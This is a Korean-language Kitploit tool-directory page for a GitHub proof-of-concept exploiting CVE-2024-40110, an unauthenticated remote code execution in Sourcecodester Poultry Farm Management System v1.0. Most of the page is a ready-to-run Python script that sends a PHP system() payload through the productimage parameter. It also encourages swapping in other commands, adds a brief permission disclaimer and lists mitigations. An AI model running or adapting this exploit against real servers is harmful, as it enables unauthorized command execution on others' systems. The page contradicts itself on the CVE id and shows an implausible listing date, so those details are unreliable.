Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-40110 — Sourcecodester Poultry Farm Management System의 취약한 productimage 매개변수를 통한 인증되지 않은 원격 코드 실행을 시연하는 개념 증명 스크립트입니다. | Kitploit
도구/GitHubGitHub/abdurahmon3236/cve-2024-40110
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Sourcecodester Poultry Farm Management System의 취약한 productimage 매개변수를 통한 인증되지 않은 원격 코드 실행을 시연하는 개념 증명 스크립트입니다.

저장소 보기
22년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Sourcecodester Poultry Farm Management System v1.0의 인증되지 않은 원격 코드 실행 취약점 PoC (Proof of Concept)

이 저장소는 Sourcecodester Poultry Farm Management System v1.0에서 인증되지 않은 원격 코드 실행(RCE) 취약점을 증명하는 PoC 스크립트를 포함합니다. 이 취약점은 /farm/product.php의 productimage 매개변수에 존재하며, 공격자가 서버에서 임의 코드를 실행할 수 있게 합니다.

목차

  • 취약점 설명
  • 설정 및 사용법
    • PoC 스크립트
  • 중요 사항
  • 완화 방안

취약점 설명

CVE-ID: (미할당)

개요: Sourcecodester Poultry Farm Management System v1.0은 /farm/product.php의 productimage 매개변수를 통해 인증되지 않은 원격 코드 실행(RCE) 취약점을 포함합니다. 이 취약점으로 인해 공격자는 인증 없이 서버에서 임의 코드를 실행할 수 있습니다.

영향받는 버전:

  • Sourcecodester Poultry Farm Management System v1.0
  • 설정 및 사용법

    사전 요구사항

    • Python 3.x
    • requests 라이브러리 (pip install requests)

    PoC 스크립트

    이 스크립트는 공격자가 취약한 매개변수에 악의적인 요청을 보내 RCE 취약점을 악용하는 방법을 보여줍니다.

    다음 스크립트를 rce_poc.py로 저장하고 실행하세요.

    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://target-url/farm/product.php"  # Change this to the target URL
    
    # Malicious payload
    # The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
    # Here, we are using a simple PHP payload to demonstrate the RCE
    payload = "<?php system('ls'); ?>"
    
    # Construct the malicious request
    data = {
        'productimage': payload  # The vulnerable parameter
    }
    
    def exploit_rce(url, data):
        """
        Exploit the RCE vulnerability by sending a malicious request to the target URL.
    
        Args:
            url (str): The target URL.
            data (dict): The data to be sent in the POST request.
        """
        try:
            response = requests.post(url, data=data)
            
            # Print the response details
            print("Status Code:", response.status_code)
            print("Response Body:", response.text)
            
            if response.status_code == 200:
                print("[+] Successfully executed the payload.")
            else:
                print("[-] Failed to execute the payload.")
        except requests.RequestException as e:
            print(f"[-] An error occurred: {e}")
    
    if __name__ == "__main__":
        print(f"Sending malicious request to: {target_url}")
        exploit_rce(target_url, data)
    

    설명

    1. 설정: target_url을 취약한 서버의 /farm/product.php 엔드포인트 URL로 설정합니다.
    2. 페이로드: 페이로드는 간단한 PHP 명령 실행 페이로드입니다. 필요에 따라 다른 명령을 실행하도록 페이로드를 수정할 수 있습니다.
    3. 요청 구성: 스크립트는 productimage 매개변수에 악성 페이로드를 포함한 POST 요청을 구성합니다.
    4. 익스플로잇 함수: exploit_rce() 함수는 대상 URL로 악성 요청을 보내고 응답 세부 정보를 출력합니다.
    5. 스크립트 실행: 실행되면 스크립트는 RCE 취약점을 악용하고 결과를 출력합니다.

    중요 사항

    • 권한: 대상 시스템에서 이 취약점을 테스트할 명시적 권한이 있는지 확인하십시오. 허가 없는 테스트는 불법이며 비윤리적입니다.
    • 테스트 환경: 프로덕션 시스템에 영향을 미치지 않도록 통제된 환경에서 이 테스트를 수행하십시오.
    • 페이로드 커스터마이징: 원하는 명령 실행을 달성하기 위해 필요에 따라 페이로드를 사용자 지정하십시오.

    완화 방안

    이 취약점을 완화하려면 다음 단계를 적용하십시오.

    • 입력 검증: 사용자 입력을 정화하기 위해 적절한 입력 검증을 구현합니다.
    • 파일 업로드 제한: 특정 파일 형식만 허용하고 크기 제한을 적용하도록 파일 업로드를 제한합니다.
    • 소프트웨어 업데이트: 보안 패치 및 수정 사항을 적용하기 위해 소프트웨어를 정기적으로 최신 버전으로 업데이트합니다.

    이러한 완화 단계와 보안 모범 사례를 따르면 Sourcecodester Poultry Farm Management System v1.0에서 이와 같은 RCE 문제를 예방할 수 있습니다.

    도구 다운로드